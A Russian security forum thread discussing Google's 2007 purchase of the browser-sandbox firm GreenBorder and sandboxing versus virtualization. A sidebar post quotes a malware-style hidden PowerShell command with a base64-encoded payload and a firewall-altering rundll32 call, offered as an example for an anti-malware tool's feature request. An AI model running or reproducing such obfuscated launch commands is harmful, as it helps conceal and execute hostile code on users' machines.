Перейти к содержанию
_Stout

Google ставит на «песочную» ИБ: покупка GreenBorder

Recommended Posts

_Stout

Google объявил о приобретении калифорнийской компании GreenBorder, разработчика системы защиты системы от угроз при посещении веб-страниц. Сумма сделки не разглашается.

http://biz.cnews.ru/news/line/index.shtml?2007/05/29/252401

Что думают уважаемые коллеги по этому поводу?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Иван

радуюсь за гугл, очень правильный ход, зачем пользоваться всяким леваком от микрософт и прозводителей нативирусов, когда можно купить и после докрутки выпустить свой собственный сервис

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dmitry Perets
радуюсь за гугл, очень правильный ход, зачем пользоваться всяким леваком от микрософт и прозводителей нативирусов, когда можно купить и после докрутки выпустить свой собственный сервис

Гугл продолжает издеваться над Микрософт, перехватывая её начинания и реализуя их лучше? =))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Иван

точно продолжает издеваться, ведь идея песочницы это по сути идея виртуалицации, т.е все происходит в некоей изолированной от операционки среде, все проблемы с которой можно откатить назад

Микрософт же думает о виртуализации всего вся, приложений, файлов и т.д. https://msdb.ru/Downloads/f/e9897997-29c8-4...ation_ru-ru.ppt Собсвенно о запуске приложений в некой изолированной среде как о средстве защиты говорилось на презентации форефронта 17го мая

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lex

А о захвате контроля над виртуальными машинами говорилось 31 мая в докладе Рутковской.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Inkogn
Микрософт же думает о виртуализации всего вся, приложений, файлов и т.д.

Виртуальный Ring0 для АВ и настоящий для несоблюдающих EULA?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×